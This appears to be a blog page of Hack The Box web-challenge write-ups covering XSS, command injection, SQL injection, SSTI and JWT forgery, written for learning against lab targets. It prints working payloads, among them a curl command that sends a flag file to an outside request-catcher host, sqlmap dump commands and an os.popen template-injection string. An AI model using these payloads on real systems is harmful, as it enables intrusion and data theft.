haxez, Author at haxez

Hack The Box – SpookTastic

Posted on February 4, 2025 by haxez

SpookTastic is a very easy web challenge created by leanthedev on Hack The Box. It requires basic code review and XSS to complete. Hello world, welcome to haxez where today I will be trying to complete the SpookTastic web challenge. Fortunately, this time I was able to download the source code which made things a bit easier.

SpookTastic Application Enumeration

As with all application challenges, I fired up OWASP ZAP, opened Firefox and navigate to the application. I wasn’t sure what the function of the application was. It appeared to have a store where it sold a few products. Furthermore, there was also a register email option at the bottom of the page which is where the vulnerability was. Other than that, there wasn’t much else. I ran an Ajax Spider and Active Scan but it didn’t find much.

Source Code Review

I extracted the downloaded files and opened the app.py file. After reading through the file I noticed that that the API register endpoint had an if statement in it pointing to a blacklist function. If the value submitted to the register input box didn’t pass the blacklist function then it wouldn’t work. I went hunting for the blacklist function and found that it checks to see whether the word script is included. It appeared it was some form of validation on the user input.

Exploiting SpookTastic

Please note that I was not able to complete this challenge in Firefox. For some reason, the popup box didn’t appear when submitting the correct payload. Anyway, in the code there is a function that spawns a window with the flag. I’m not 100% sure about the code that recognises the XSS but that is something I will come back in my own time. Anyway, in order to solve the challenge, you need to trigger an XSS pop up without using the script tag. There are a few payloads that can do this but I used the one below.

<img src=err onerror=alert('haxez')>

That created an alert and gave me the flag to solve the challenge.

SpookTastic Learnings

What’s great about the challenges where you can download the code is that you can see the protection mechanisms in place. One thing I have always struggled with is understanding how payloads bypass protection mechanisms. Everything makes much more sense once you actually see the backend code of the application. Anyway this was a fun challenge.

Hack The Box – TimeKORP

Posted on February 3, 2025February 3, 2025 by haxez

TimeKORP is a very easy web challenge created by makelaris on Hack The Box. This challenge requires performing a remote code execution attack. Hello world, welcome to haxez where today I will be putting my web hacking skills to the test by trying to compromise the TimeKORP very easy web challenge. Unlike some of the other challenges I’ve previously complete, this challenge doesn’t have any files to download. Lets crack on.

TimeKORP Application Enumeration

First, I launched OWASP ZAP (because I’m trying to learn it) and navigated to the provided IP address. Once the application loaded, I was presented with a fairly basic page that displayed the time. After clicking the ‘What is the date?’ link at the top of the page, I was shown the current date. That was the extent of the application functionality.

ZAP It

As I was viewing the application through ZAP, I decided to run the Ajax spidering tool to see if there was any content that I was missing. Other than a an assets and static directory which contained nothing interesting, there wasn’t anything else for me to look at.

As a result, I decided I should active scan the application. Granted, it isn’t always advised to use active scan. This is especially true with pages that contain sensitive functionality. However, these labs were designed to test out tools so that is exactly what I did.

TimeKORP Active Scan

Using the OWASP ZAP browser HUD, I clicked the active scan button and waited for it to finish. As you can see from the image below, ZAP was able to find several issues ranging in severity from informational, low risk, medium risk and high risk. The informational, low and medium risk findings were all fairly standard misconfigurations such as a missing Content Security Policy header. However, the high risk finding was a Remote OS Command Injection vulnerability.

Poking The Bug

I navigated through the HUD to view and replay the request in the browser. The active scan performed a sleep command and I assume it detected that the page took a second to respond thus indicating the application was vulnerable. The URL below is the payload that active scan used to determine there was a vulnerability.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26sleep+1.0%26%27

I modified that code to further confirm the vulnerability by running a few different commands. For example I ran the whoami command which told me I was www.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26whoami%26%27

I ran a few other commands such as uptime to confirm I had code execution as the output on the screen wasn’t all that revealing.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26uptime%26%27

Finding The Flag

This is where things got a bit obscure. I used the ls flag and performed various directory traversals but I couldn’t find the location of the flag. What’s odd is that I could list out the views directory and see the index.php but not the flag. I didn’t think it could be a permissions issue as if I was allowed to read the flag file then I should be able to see it. Furthermore, the flag file didn’t start with a dot so it wasn’t a hidden file either. Anyway, I finally found the flag one directory above and was able to read it using the following URL.

https://94.237.54.164:31059/?format=%25H%3A%25M%3A%25S%27%26cat%20../flag%26%27

TimeKORP Learnings

I remember a quote, I think it was from Darknet Diaries. It said that hacking is like trying to navigate a maze in the dark. You have no way of knowing where you’re going or even if you are going in the right way. I’m paraphrasing but that reflects my thoughts on this challenge. When I first started penetration testing and doing web applications I was told never to use Burp Active Scan. They explained it was because it could break applications. I’ve looked at some of the payloads and believe it to be absolutely true. However, I’m trying to adopt a new mindset of active scan where you can but ensure the client has a backup.

Hack The Box – KORP Terminal

Posted on January 28, 2025 by haxez

KORP Terminal is a very easy web challenge created by leanthedev on Hack The Box. This challenges requires knowledge of SQL injection. Unlike previous tasks, we don’t have the option to look at the source code for this challenge. Hello world, welcome to haxez where today I will be attempting to own KORP Terminal.

KORP Terminal Application Enumeration

Upon navigating to the application, we are presented with a blue background and a login box. Thats it. You can view the source code but there isn’t much there to view. I ran OWASP ZAP Ajax spider and active scan against it but it didn’t find anything other than the low hanging fruit of HTTP headers. The application has a login box but that’s it. As a result, I attempted some default creds such as admin admin but no luck.

Attacking The Application

Since there isn’t anything else other than the login form, I’m going to go out on a limb and say that I’m supposed to attack that. There are multiple ways that we could attack it. For example, we could use something like Hydra to try and brute force our way in. However, since we don’t know the username, we could be here all day. Instead, lets assume that it is powered by a database and start with some basic SQL injection attacks. To start with, I input a single quite in to both the username and password box. As shown below, the application is indeed vulnerable to SQL injection due to the lack of prepared statements.

Preparing The Request

To attack the login form, I’m going to sqlmap. However, first I need a valid POST request containing the username and password parameters. Did you know that if you specify an Asterix (*) in the parameters of the request, sqlmap will automatically recognise them as insertion points? I didn’t until today. As you can see below, I found the login POST request in ZAP and copies the request to a file called request.txt.

KORP Terminal SQL Injection

To keep it short and sweet, I ran sqlmap against the request. It automatically identified the insertion points and found that it was vulnerable. Next, I simply told sqlmap to dump the database and eureka! it spat out a username and password hash. As you can see from the image below, the username is admin and the password hash appears to be a bcrypt hash (at least according to hashcat examples).

sudo sqlmap -r request.txt --ignore-code 401 --dump

Hash Cracking

Next, it was time to crack the hash. As per the link above in the hashcat examples, you can find the type of hash and the cracking mode needed to crack it. I used the rockyou wordlist because it is a fairly common wordlist and most of the passwords for these challenges and the boxes tend to appear in there. After a few minutes (running on a vm because noob) I cracked the hash. As you can see from the screenshot below, the password was password123. With the username admin and the newly cracked password, I was able to login and get the hash.

HTB{t3rm1n4l_cr4ck1ng_4nd_0th3r_sh3n4nig4n5}

KORP Terminal Learnings

Not much to say about this one. It was a nice fun quick challenge before I power down for the evening. I suppose a lesson that can be taken from this challenge is not to rely on automated scanners like Burp or OWASP Active Scan. They don’t always find a vulnerability that could easily be found by just submitting a single quotation mark. I find it odd that it didn’t find the error but anyway that’s all from today.

Hack The Box – Phantom Script

Posted on January 27, 2025January 27, 2025 by haxez

Phantom Script is a very easy web challenge created by Xclow3n on Hack The Box. This challenge is simple as the answer is on the page. However, I believe the purpose of this challenge is to understand why one works but not the other. Hello world, welcome to haxez where today I will be exploiting an XSS vulnerability.

Phantom Script Application Enumeration

The application is very basic offering only a search box to search through the different scrolls on the page. To the right of the search box is the vulnerable code. Finally, underneath the vulnerable code are some example payloads. The answer is right there on the page, all you need to do is test the different payloads and eventually the flag will pop up. But why does it pop up.

HTML Child Elements

When we test the first payload of:

<script>alert('Boo!');</script>

The browser renders the script tag as plain text rather than executing it. This happens because the script tag is not treated as a child element of the parent h2 tag. It is instead interpreted as part of the element’s textual content. As a result, the payload does not work for XSS in this case.

However, if we use an img element, it is rendered as HTML because the browser recognises img as a valid child element. The browser parses the img element properly, and attributes like onerror are processed, allowing for XSS execution.

<img src=x onerror="alert('Boo!')">

The Flag

After submitting the payload, click the alert blox to close it and the flag will appear on the screen like magic.

HTB{xS5_iS_34SY_wh4t_d0_you_th1nk?}

Phantom Script Learnings

I must admit that this answered a question that I’ve been struggling with for a long time. It’s great being able to find bugs but understanding why they are there makes finding them easier. Before doing this challenge, I didn’t know that only child elements would work when rendered in a html tag. I suspect I have missed multiple oppertunities to get XSS because of this reason. This is why it is important to do additional reading when going through challenges and boxes.

Hack The Box – Unholy Union

Posted on January 26, 2025January 26, 2025 by haxez

Unholy Union is a very easy box created by Xclow3n on Hack The Box. As the name suggests, we will need some SQL skills to complete this challenge. Hello world, welcome to haxez where today I will be refreshing my SQLi skills and attempting to complete this very easy challenge. I haven’t done proper SQL injection in a while, especially UNION based injection.

Unholy Union Application Enumeration

I started by navigating to the page in my browser. With these challenges, there is usually fairly little to actually enumerate. The vulnerability is tends to be fairly obvious but its exploiting that vulnerability that’s the problem. As you can see from the image below, OWASP ZAP found the SQL injection vulnerability without issue. However, finding the vulnerability and getting the flag are two different problems entirely. I could run SQL map against it and try and dump the whole database. Actually, that’s exactly what I’m going to do.

The Easy Way With SQLMAP

First, I wanted to check if the database was vulnerable so I ran the following command and identified that there were 5 columns.

sqlmap -u http://94.237.54.42:37032/search?query= --level=5 --risk=3

Next, I ran the following command to get the database names. I could have just dumped everything but that would be a lot of data to sort through and would take much longer. As you can see from the results below, I found three databases.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 --dbs

It seemed fairly obvious that the database I needed was called halloween_invetory so I specified that in the next query and used it to dump the tables in that database.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory --tables

With the name of the database and the table I was able to use sqlmap to dump the contents of the table and retrieve the flag. It was fairly ovbious which table contained the flag. As you can see below, I used the following command to dump the flag and complete the challenge.

sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory -T flag --dump

HTB{un10n_1Nj3ct1on_15_345y_t0_l34rn_r1gh17?}

The Hard Way

I’m not going to go in to too much detail on this method as I have already got the flag. However, in order to perform a UNION based SQL injection you would first identify whether the application is vulnerable. This is often achieved by placing a single quotation mark or a ` in the query to break the syntax. As shown below, the application does produce an error message when breaking the syntax.

Next, you would determine how many columns there are by using NULL value columns. To explain, using the NULL value means no data. Therefore, it should produce an error due to the formatting of the column. Furthermore, if the number of columns is wrong, the database will produce an error. For example, if I used three NULL columns and tried to concatenate in to the fourth column I would get an error.

Gun' UNION SELECT NULL, NULL, NULL, (SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata) -- -

However, if I used 4 NULL columns and then concatinate the results in to the 5th column it works. The syntax would be correct as there are 5 columns. As you can see from the image below, the syntax is correct and the data from the information schema table is dumped.

This method can then be used to find the names of the databases, tables and to eventually select the data from the flag table.

Unholy Union Learnings

I should have spent more time going through this one to do it manually but I’m a bit short on time. It was a fun challenge anyway and it jogged my memory on a few things. I struggled with the injection syntax as it has been a long time since I have done it manually. You could argue that is why we have tools but I don’t think thats a good attitude to have. I understand the vulnerability though and how it is structured. It’s just remembering what to use where.

Hack The Box – WayWitch

Posted on January 25, 2025January 25, 2025 by haxez

WayWitch is a very easy web challenge created by Xclow3n on Hack The Box. To complete this challenge you need an understanding of JWT. Hello world, welcome to haxez where today I am going to complete the WayWitch web challenge. This challenge was a lot of fun and was fairly easy to complete. While I already understood JWT, it was good to refresh that knowledge.

WayWitch Application Enumeration

To load the application, I needed to specify HTTPS. The challenges I have completed so far have all been HTTP. Attempting to connect via HTTP returned a connection reset error. After loading the application, it was evident that it was some type of ticketing system. There was no login or any other functionality.

Source Code Review

The web challenges allow you to download the source code. This allows for a white box style assessment in that you get to see the code behind the application. After downloading the zip file, I opened the routes.js. The routes file typically controls the logic behind navigating the application. For example, index.html is a route. As you can see below, there is a route for tickets.

I attempted to navigate to the tickets route or page and received an error explaining that access was denied and that admin privileges were required. This was expected as the source code of the application has an if statement based on the contents of the session token. As seen above, the if statement checks the session token to see whether username is equal to admin. If it matches, it will allow the user to view the tickets route. With that in mind, I knew that I could forge a JWT cookie to contain the username admin. However, in order to do that we need the JWT secret signing key.

WayWitch Secret

I opened the util.js code and the secret was there. Furthermore, the secret can also be obtained by inspecting the web applications page source. This demonstrates why it is always important to view the page source of an application when testing it. This is something I neglect to do more than I care to admit. However, with this example now demonstrating the importance of doing so, I will be sure to be more diligent.

Forging The JWT

I took the existing cookie from my browser by inspecting the page and heading to the application tab. From there I took the value of the session_token cookie and pasted it in to jwt.io. Next, I updated the username to admin and changed the secret key to the one found in the source code (halloween-secret).

I then copied the returned encoded JWT and pasted it in to the value of the session_token in my browser. Next, I refreshed the page and the spooky black magic had worked. I now had access to the tickets route and could see all the tickets that had been previously submitted. Furthermore, the tickets contained the flag thus allowing me to solve the challenge.

HTB{k33p_th3s3_jwt_s3cr3t_s4f3f_br0}

WayWitch Learnings

This was an very fun challenge. It wasn’t too difficult and the code was easy to understand. It was very obvious that in order to access the tickets page, I needed to meet the conditions set out in the if statement (having the username be admin). With that said, I believe that if I hadn’t found the JWT secret in the page source, I might have got stuck for a bit trying to submit the new cookie without the secret. This was another great web challenge and I’m enjoying going through them. I suspect I will start hitting a wall when I get to the easy and medium challenges.

Hack The Box – Void Whispers

Posted on January 24, 2025 by haxez

Void Whispers is a very easy web challenge created by Xclow3n on Hack The Box. In order to solve it you will need some web and Linux skills. Hello world, welcome to haxez where today I’m looking at Void Whispers. Admittedly, I found the problem from the source code quite quickly but didn’t have a clue how to exploit it.

Void Whispers Application Enumeration

Upon initially navigating to the application, it was fairly obvious where the exploit was going to be. The application takes certain parameters and then appear to update a configuration file somewhere. However, the thing that instantly caught my eye was the path to the send mail binary.

My initial thought was to specify the binary. Then, perhaps I could use the other input fields to specify the command. As a result, I attempted to specify the path to bash and run simple commands like whoami and ls. Neither of them worked, despite how I input the values. I also attempted to active scan the page using Zap but it didn’t find anything.

Source Code Analysis

I’m not great at programming, in fact, I’m dreadful at it. I was surprised that I immediately knew where the vulnerability was as soon as I saw it. Ok, I sort of knew where the vulnerability was. I was right about the location but wrong about the problem. This issue can be found in the IndexController.php file on line 40. As you can see, the output of shell_exec is being passed to the $whichOutput variable.

$whichOutput = shell_exec("which $sendMailPath");
    if (empty($whichOutput)) {
      return $router->jsonify(['message' => 'Binary does not exist!', 'status' => 'danger'], 400);
    }

Now, I initially thought that the vulnerability was going to be due to code not using the absolute path. However, that quickly passed as that would make no sense for the current context. We wouldn’t be able to create our own binary called which.

Void Whispers Exploitation

I am happy to have identified that the code looked like it was an issue. However, the issue was more to do with validation. As you can see from the highlighted code below, the code only validates to see whether there are any spaces. So, provided we can fool it in to accepting spaces, we should be able to append any other command.

Fortunately, Bash has something called an Internal Field Separator or IFS which is exactly what it sounds like. It is a separator or a space. However, this is where I ran into more problems. I tried several commands, but the output of those commands was not returned in the response. This is why Zap did not find the command execution.

Exfiltrating The Data

This type of blind exploit is where I tend to have trouble. If the application does not scream at me that it is vulnerability, then I start to think I am completely wrong and should move on to something else. It is the same with blind SQL injection, blind XSS and any other blind exploit. It is like trying to navigate a maze in complete darkness. This is where the try harder mindset comes in. Anywhere there is this useful application called request catcher that allows you to send request to it. By appending a curl command and cat command to the send mail binary bath we can POST the flag to request catcher.

/usr/bin/curl;curl${IFS}-X${IFS}POST${IFS}heapbytes.requestcatcher.com/test${IFS}-d${IFS}"$(cat${IFS}/flag.txt)"

HTB{c0mm4nd_1nj3ct1on_15_3457_t0_f1nD!}

Void Whispers Learnings

So, for once I can say that finding the exploit was fairly simple. I was surprised that I was able to spot it easily. I am not sure if its because I have worked with PHP previously and was more comfortable reading it. Honestly, it was because shell_exec immediately set of alarm bells as shell is bad right? So that part was not too bad but trying to find a way to exploit it was difficult for me. With that said, I had a lot of fun but have realised that I am out of practise and need to start drilling again.

Hack The Box – Spookifier

Posted on January 22, 2025January 22, 2025 by haxez

Spookifier is a very easy web challenge created by Xclow3n on Hack The Box. To hack it, we will need to exploit Server Side Template Injection. Hello world, welcome to haxez where today we will hack the Spookifier challenge. The challenge has the following introduction:

There’s a new trend of an application that generates a spooky name for you. Users of that application later discovered that their real names were also magically changed, causing havoc in their life. Could you help bring down this application?

Enumerating Spookifier

Upon navigating to the page, we are greeted with a purple web application with some graphics and an input box. Furthermore, the box asks us to input our name so that it can spookify it and produce our new spooky name. After inputting our name, the application appears to output our name but in a different font.

Source Code Review

Back in the Hack The Box portal there is an option to download the files associated with the challenge. Fortunately for me, we live in an age of AI which should more than make up for my complete lack of programming skills. Honestly, I wouldn’t recognise a code vulnerability even if the variable was named exploit_me.

from flask import Blueprint, request
from flask_mako import render_template
from application.util import spookify

web = Blueprint('web', __name__)

@web.route('/')
def index():
    text = request.args.get('text')
    if(text):
        converted = spookify(text)
        return render_template('index.html',output=converted)
    
    return render_template('index.html',output='')

Looking through the code it appears to be a Python web framework or Flask application with Mako which is a templating engine. Furthermore, the purpose of the application is to process user input dynamically and render HTML. At least, that’s what AI is telling me.

Understanding The Vulnerability

The application has a vulnerability because it directly renders user input text in the template using the render_template function, without any input sanitization or validation. I’m not going to dig much deeper than that because that would cause me to go down rabbit holes and its already getting late. However, the vulnerability could potentially be fixed by adding safe_output = Markup.escape(converted) to properly escape the text. With that said, we can try an SSTI payload and see if we get the expected result. As you can see below, I have submitted ${404*2} which if calculated correctly should return Bob or 808.

Understanding The Spookifier Vulnerability

Exploiting Spookifier

Now that we know it is vulnerable, we can get a payload from PayloadAllTheThings and modify it for our purposes. First, we will need to list out the current directory and the directories above it to find the flag.

${self.module.cache.util.os.popen('ls ../').read()}

Then once we know where the flag is, we can modify the payload again to read the flag.

${self.module.cache.util.os.popen('cat ../flag.txt').read()}

HTB{t3mpl4t3_1nj3ct10n_C4n_3x1st5_4nywh343!!}

Spookifier Learnings

So I believe this vulnerability would have been found quickly with either Burp or Zap but as Iron Man once said to Spider-Man…

If you’re nothing without the suit (tools) then you shouldn’t have it

I understand why this application is vulnerable even if I don’t fully understand the Python and Mako templates that make it vulnerable. User input sanitisation is important for all untrusted data being input into an application. Anyway, thats it. Also my spellcheck tools are playing up so there are probably errors sorry.

Hack The Box – Flag Command

Posted on January 21, 2025January 21, 2025 by haxez

Flag Command is a very easy web challenge created by Xclow3n on Hack The Box. To solve this challenge you need to review the requests. Hello world, welcome to haxez where today I will be attempting to solve the Flag Command web challenge.

Getting Started With Flag Command

In order to get started with Flag Command, we must first head to the challenges section within Hack The Box. From there, we need to find the web section and got to the retried challenges. Next, we can filter the challenges by very easy and it will be one of the first in the list. Once you have found the challenge, simply click Spawn Instance to start the isntance. It will give you an IP address that you can visit in your browser.

Application Enumeration

Once we visit the IP address, we recieve some text explaining that we have foud ourselves in a bizarre alien forest. Additionally, We have no idea how we got there but we can hear eerie indistinguisable sounds. The text explains more but this is cleary designed to mimic an old text adventure game. Therefore, we should be able to input commands to play the game. One of the first commands that it is always worth testing is the help command. That will tell you how to play the game.

As you can see from the image above, we have several commands that we can use. Furthermore, Using the info command just spits the text back out at us so we need to dig a little deeper. However, our aim here isn’t to play the game is it. Our aim is to hack the game.

Inspecting Flag Command

By right clicking on the page and clicking inspect, we can bring up the developer console. Next, if we refresh the page we will capture the traffic that the browser is sending in recieveing. For example, if we click on the network tab and click the refresh button, we can see all the inidvidual scripts that are being loaded by the browser.

Solving The Challenge

By looking through each one of the Javascript files, we eventually get to the options files which appears to contain all the possible game commands. However, hiding at the bottom of the options file is a secret command called secret. The value of this command is as follows:

Blip-blop, in a pickle with a hiccup! Shmiggity-shmack

Therefore, if we type start to start the game and the input the secret command, we win. The flag is returned to the screen which we can then paste back in to the Hack The Box challenge page and solve the challenge.

HTB{D3v3l0p3r_t00l5_4r3_b35t__t0015_wh4t_d0_y0u_Th1nk??}

Flag Command Learnings

This was a fun challenge. It reminded me of my early days when I first started learning hacking on Hack This Site. Granted, it is a bit more complex than just viewing the page source to find the password but times have evolved since then. Low hanging fruit on applications seems to be getting higher and higher as our understanding of security improves. Anyway, I love web challenges. The themes of them are always fun rather than just looking at a terminal for hours. Not that I don’t sometimes enjoy that too.

Hack The Box – Didactic Octo Paddles

Posted on January 21, 2025January 21, 2025 by haxez

Didactic Octo Paddles was the sith web challenge from the Hack The Box Cyber Apocalypse Capture The Flag competition. It was also the bane of my existence and my worst enemy. Hello world, welcome to Haxez where today I will be explaining how I eventually hacked Didactic Octo Paddles. All the challenges had a description fitting the theme of the CTF and this one was no different.

You have been hired by the Intergalactic Ministry of Spies to retrieve a powerful relic that is believed to be hidden within the small paddle shop, by the river. You must hack into the paddle shop’s system to obtain information on the relic’s location. Your ultimate challenge is to shut down the parasitic alien vessels and save humanity from certain destruction by retrieving the relic hidden within the Didactic Octo Paddles shop.

Application Adventure

This application broke me for all the wrong reasons. It was a great challenge and I learnt a lot from it but tiny mistakes made me waste so much time. Anyway upon navigating to the application, I was greeted with a purple login page. There was no apparent option to register so I immediately thought it was SQL injection again. It wasn’t

Blasting Didactic Octo Paddles

Using my new favourite web application file and directory discovery tool Ferric Oxide, I was able to discover a few endpoints. As you can see from the screenshot below there were endpoints for registration, administration and authentication. I guess the way in wasn’t via SQL injection after all. With this new knowledge, I headed to the registration section and registered a new user.

Didactic Octo Paddles Store

Upon registering and logging in I was met with a store page. I had a lot of fun wasting my time with this functionality. Initially, I thought I was being clever by changing the number of the item that you add to the cart. I thought I was clever by doing a lot of things. None of them made a difference. The objective of this challenge was to gain access to the admin area at ‘/admin’.

Cookies, Cookies, Cookies

After digging around the application a bit more and identifying the frameworks, I started learning about JWT tokens. I haven’t done much with them before as I don’t test many web applications. I then started playing with the JWT token with JWT_Tool. Unfortunately, I have a lot to learn with this tool and at the time I was tired so decided just to use Burp.

You can see from the screenshot below that I used the Burp extension JSON Web Tokens to set the “alg” to none and the “id” to 1. I then sent the request to the admin endpoint and I was authenticated. It’s a shame that I couldn’t get this to work with JWT_Tool. I could go through and manually change the values but I wanted it to catch the successful authentication through automated testing.

Server Side Template Injection

Hold on, we aren’t finished yet. We have access to the admin portal but no flag. However, the admin portal has a list of active users. I could walk you through the various stages of identifying SSTI such as creating a user with ‘{{ 2 * 404 }}’ in order to get Bob but let’s get on it. First, I went to HackTricks and search for SSTI and found the Node JS Render payloads. Next, I modified their payload to cat the flag.txt file.

Finally, I registered a user with the above payload for their username and a standard string for their password. I then went back to burp and resent the request with the modified JWT token and as you can see below, we got the flag.

HTB{Pr3_C0MP111N6_W17H0U7_P4DD13804rD1N6_5K1115}

Didactic Octo Paddles Review

Looking back, I think this was a fairly simple challenge. However, this challenge absolutely broke me. I was up until the early hours of the morning trying to work this challenge out. This was entirely due to my lack of knowledge of JWT tokens and their quirks. I learnt a lot from it and now I want to master the JWT_Tool and Cookie-Monster tools. I’m starting to like working with parts of the MEAN stack. I’ve mostly only learnt about and tested LAMP-based applications so this is a whole new world for me to explore. Anyway, this is as far as I got with the web challenges. I completed some other challenges but I don’t know if I’m going to write those up.